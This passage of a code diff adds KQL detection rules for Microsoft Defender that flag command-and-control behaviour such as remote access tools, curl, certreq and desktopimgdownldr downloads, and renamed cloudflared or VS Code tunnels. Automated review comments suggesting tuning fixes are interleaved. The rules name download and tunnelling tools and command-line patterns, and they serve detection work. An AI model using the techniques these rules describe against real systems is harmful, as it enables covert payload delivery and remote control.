+| where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wevtutil.exe") and (InitiatingProcessCommandLine contains ":\\Windows\\TEMP\\ScreenConnect\\" and InitiatingProcessCommandLine contains "run.cmd")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql
new file mode 100644
index 00000000..222a5089
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - Simple Help Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate usage of the tool
+
+DeviceProcessEvents
+| where (FolderPath contains "\\JWrapper-Remote Access\\" or FolderPath contains "\\JWrapper-Remote Support\\") and FolderPath endswith "\\SimpleService.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
new file mode 100644
index 00000000..22cd54bc
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server
+// Author: Ahmed Nosir (@egycondor)
+// Date: 2025-05-29
+// Level: medium
+// Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line.
+These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.
+This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219, attack.t1105
+// False Positives:
+// - Legitimate system administrator deploying TacticalRMM
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--api" and ProcessCommandLine contains "--auth" and ProcessCommandLine contains "--client-id" and ProcessCommandLine contains "--site-id" and ProcessCommandLine contains "--agent-type") and FolderPath contains "\\TacticalAgent\\tacticalrmm.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql
new file mode 100644
index 00000000..f760057f
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql
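Review bot: The `FolderPath contains "\\TacticalAgent\\tacticalrmm.exe"` clause ties the detection to the default install directory, so an agent launched from any other folder (or a renamed copy) with the same registration flags is missed, even though the five-flag combination on the command line is already specific to TacticalRMM. Consider dropping the path requirement or replacing it with a name check, e.g. `and (FolderPath endswith "\\tacticalrmm.exe" or ProcessVersionInfoOriginalFileName =~ "tacticalrmm.exe")`, after confirming what original-filename metadata the agent binary actually carries. The description also says "--api, --auth, and related flags" while the query requires all five flags; an install line that omits `--agent-type`, for instance, does not match, so either relax the condition or document that all five are mandatory.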
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - UltraViewer Execution
+// Author: frack113
+// Date: 2022-09-25
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName =~ "UltraViewer" or ProcessVersionInfoCompanyName =~ "DucFabulous Co,ltd" or ProcessVersionInfoOriginalFileName =~ "UltraViewer_Desktop.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql b/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql
new file mode 100644
index 00000000..e0c3c2b3
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql
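Review bot: `ProcessVersionInfoCompanyName =~ "DucFabulous Co,ltd"` is an exact (case-insensitive) match on a vendor string whose punctuation can differ between builds (`Co., Ltd`, trailing period, extra space), so a minor version-info change silently disables that branch. `ProcessVersionInfoCompanyName contains "DucFabulous"` is the more tolerant form and keeps the intent. Note that all three branches rely on version-info fields that an attacker controls when repackaging the binary, so this rule only catches the stock build; a short comment saying so under False Positives/limitations would help the next tuner.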
@@ -0,0 +1,10 @@
+// Title: Remote File Download Via Desktopimgdownldr Utility
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/lockscreenurl:http" and FolderPath endswith "\\desktopimgdownldr.exe" and InitiatingProcessFolderPath endswith "\\desktopimgdownldr.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql b/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql
new file mode 100644
index 00000000..a348e3fb
--- /dev/null
+++ b/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql
@@ -0,0 +1,10 @@ +// Title: Renamed Cloudflared.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-20 +// Level: high +// Description: Detects the execution of a renamed "cloudflared" binary. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")) or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith 
"44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith 
"19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run "))) and (not((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql b/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql new file mode 100644 index 00000000..7c2a00db --- /dev/null +++ b/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql 
@@ -0,0 +1,10 @@
+// Title: Renamed Visual Studio Code Tunnel Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-28
+// Level: high
+// Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001, attack.t1219
+
+DeviceProcessEvents
+| where (((ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") or (ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log")) and (not((FolderPath endswith "\\code-tunnel.exe" or FolderPath endswith "\\code.exe")))) or (((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql
new file mode 100644
index 00000000..04f718e6
--- /dev/null
+++ b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql
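Review bot: `isnull(ProcessVersionInfoOriginalFileName)` in the first branch is unlikely to ever be true on Defender data, where a missing version-info value is surfaced as an empty string rather than a null, so the `endswith ".exe tunnel"` branch — the one meant to catch a stripped or renamed binary with no original file name — is effectively dead and the rule leans on the other two branches. Use `isempty(ProcessVersionInfoOriginalFileName)`, which is true for both null and `""`. The same pattern is worth checking in any other converted rule that tests for an absent string column.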
@@ -0,0 +1,11 @@
+// Title: Renamed VsCode Code Tunnel Execution - File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: high
+// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceFileEvents
+| where FolderPath endswith "\\code_tunnel.json" and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/replace_exe_usage.kql b/KQL/rules/Command and Control/replace_exe_usage.kql
new file mode 100644
index 00000000..78089437
--- /dev/null
+++ b/KQL/rules/Command and Control/replace_exe_usage.kql
@@ -0,0 +1,10 @@
+// Title: Replace.exe Usage
+// Author: frack113
+// Date: 2022-03-06
+// Level: medium
+// Description: Detects the use of Replace.exe which can be used to replace file with another file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where FolderPath endswith "\\replace.exe" and (ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql
new file mode 100644
index 00000000..ffd1f6af
--- /dev/null
+++ b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql
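Review bot: In the replace.exe rule, `ProcessCommandLine contains "-a"` (and the `/a` and Unicode-dash variants) matches those two characters anywhere on the command line, including inside ordinary paths such as `C:\data-archive\` or `my-app.dll`, so essentially any replace.exe invocation with a hyphen-a somewhere in its arguments fires, whether or not the `/a` (add) switch is used. Anchor the switch on the preceding space, e.g. `ProcessCommandLine contains " -a"` and `ProcessCommandLine contains " /a"`, and apply the same leading space to the dash variants. The description would also benefit from naming what `/a` does ("adds files that exist only in the source"), since that is the behaviour the rule is actually keyed on.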
@@ -0,0 +1,15 @@
+// Title: ScreenConnect Temporary Installation Artefact
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceFileEvents
+| where FolderPath contains "\\Bin\\ScreenConnect."
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql
new file mode 100644
index 00000000..f4cb275b
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql
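Review bot: `DeviceFileEvents` with no `ActionType` filter fires on create, modify, rename and delete of every file whose path contains `\Bin\ScreenConnect.`, so a routine client update or uninstall produces a burst of alerts, one per file. The Sigma file_event source this was converted from corresponds to file creation; add `and ActionType == "FileCreated"` to keep that scope. As written the pattern also matches the permanent installation directory, not only the temporary installer location the title refers to, so either narrow FolderPath to the temp path or reword the title.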
@@ -0,0 +1,13 @@
+// Title: Suspicious Binary Writes Via AnyDesk
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-28
+// Level: high
+// Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll".
+According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,
+which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe") and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) and (not(FolderPath endswith "\\gcapi.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql
new file mode 100644
index 00000000..a8c50100
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql
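Review bot: Without an `ActionType` restriction this `DeviceFileEvents` query also reports AnyDesk deleting or renaming `.exe`/`.dll` files — for example cleaning up its own installer — as a "binary write", which is not the Red Canary behaviour the description cites and inflates a high-level rule. Add `and ActionType in ("FileCreated", "FileModified")`. The description also says "See reference section" but the converted header carries no references; either add a `// References:` line with the Red Canary link or drop the pointer.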
@@ -0,0 +1,15 @@
+// Title: Suspicious CertReq Command to Download
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-11-24
+// Level: high
+// Description: Detects a suspicious CertReq execution downloading a file.
+This behavior is often used by attackers to download additional payloads or configuration files.
+Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config" or ProcessCommandLine contains "/config" or ProcessCommandLine contains "–config" or ProcessCommandLine contains "—config" or ProcessCommandLine contains "―config") and (ProcessCommandLine contains "-Post" or ProcessCommandLine contains "/Post" or ProcessCommandLine contains "–Post" or ProcessCommandLine contains "—Post" or ProcessCommandLine contains "―Post") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certreq.exe" or ProcessVersionInfoOriginalFileName =~ "CertReq.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql b/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql
new file mode 100644
index 00000000..bad8158b
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Child Process Of Manage Engine ServiceDesk
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-01-18
+// Level: high
+// Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+// - Legitimate sub processes started by Manage Engine ServiceDesk Pro
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath contains "\\ManageEngine\\ServiceDesk\\" and InitiatingProcessFolderPath contains "\\java.exe")) and (not((ProcessCommandLine contains " stop" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql b/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql
new file mode 100644
index 00000000..6cc4fb27
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Curl Change User Agents - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects a suspicious curl process start on linux with set useragent options
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") and FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_curl_exe_download.kql b/KQL/rules/Command and Control/suspicious_curl_exe_download.kql
new file mode 100644
index 00000000..c2c540d7
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_curl_exe_download.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Curl.EXE Download
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and ((ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs") or (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\PerfLogs\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")) and (not(((ProcessCommandLine contains "--silent --show-error --output " and ProcessCommandLine contains "gfw-httpget-" and ProcessCommandLine contains "AppData") and FolderPath =~ "C:\\Program Files\\Git\\mingw64\\bin\\curl.exe" and InitiatingProcessFolderPath =~ "C:\\Program Files\\Git\\usr\\bin\\sh.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql
new file mode 100644
index 00000000..412c5335
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Desktopimgdownldr Command
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /lockscreenurl:" and (not((ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".png")))) or (ProcessCommandLine contains "reg delete" and ProcessCommandLine contains "\\PersonalizationCSP")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql
new file mode 100644
index 00000000..819ffe34
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Desktopimgdownldr Target File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath contains "\\Personalization\\LockScreenImage\\") and (not(FolderPath contains "C:\\Windows\\")) and (not((FolderPath contains ".jpg" or FolderPath contains ".jpeg" or FolderPath contains ".png")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql b/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql
new file mode 100644
index 00000000..5e9fd847
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Diantz Download and Compress Into a CAB File
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Download and compress a remote file and store it in a cab file on local machine.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains " \\\\" and ProcessCommandLine contains ".cab"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql b/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql
new file mode 100644
index 00000000..1b0969d9
--- /dev/null
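Review bot: The diantz rule keys solely on `ProcessCommandLine contains "diantz.exe"`, so an invocation that omits the extension (`diantz \\host\share\payload out.cab`) or uses a renamed copy of the binary is missed, while the extrac32 rule added in this same patch also checks `FolderPath endswith` and `ProcessVersionInfoOriginalFileName`. Align the two: `(ProcessCommandLine contains "diantz.exe" or FolderPath endswith "\\diantz.exe" or ProcessVersionInfoOriginalFileName =~ "diantz.exe")` — confirm the original-filename value in diantz.exe's version resource before relying on that last clause. The description ("Download and compress a remote file ...") reads as an instruction rather than a detection statement; "Detects diantz.exe being used to fetch a file from a UNC path and store it in a local CAB archive" would be clearer.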
+++ b/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Download from Office Domain
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-27
+// Level: high
+// Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.resource-development, attack.t1105, attack.t1608
+// False Positives:
+// - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "https://attachment.outlook.live.net/owa/" or ProcessCommandLine contains "https://onenoteonlinesync.onenote.com/onenoteonlinesync/") and ((FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains ".DownloadString("))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql b/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql
new file mode 100644
index 00000000..9f87de9e
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Dropbox API Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-20
+// Level: high
+// Description: Detects an executable that isn't dropbox but communicates with the Dropbox API
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.exfiltration, attack.t1105, attack.t1567.002
+// False Positives:
+// - Legitimate use of the API with a tool that the author wasn't aware of
+
+DeviceNetworkEvents
+| where (RemoteUrl endswith "api.dropboxapi.com" or RemoteUrl endswith "content.dropboxapi.com") and (not(InitiatingProcessFolderPath contains "\\Dropbox"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_extrac32_execution.kql b/KQL/rules/Command and Control/suspicious_extrac32_execution.kql
new file mode 100644
index 00000000..5a108eba
--- /dev/null
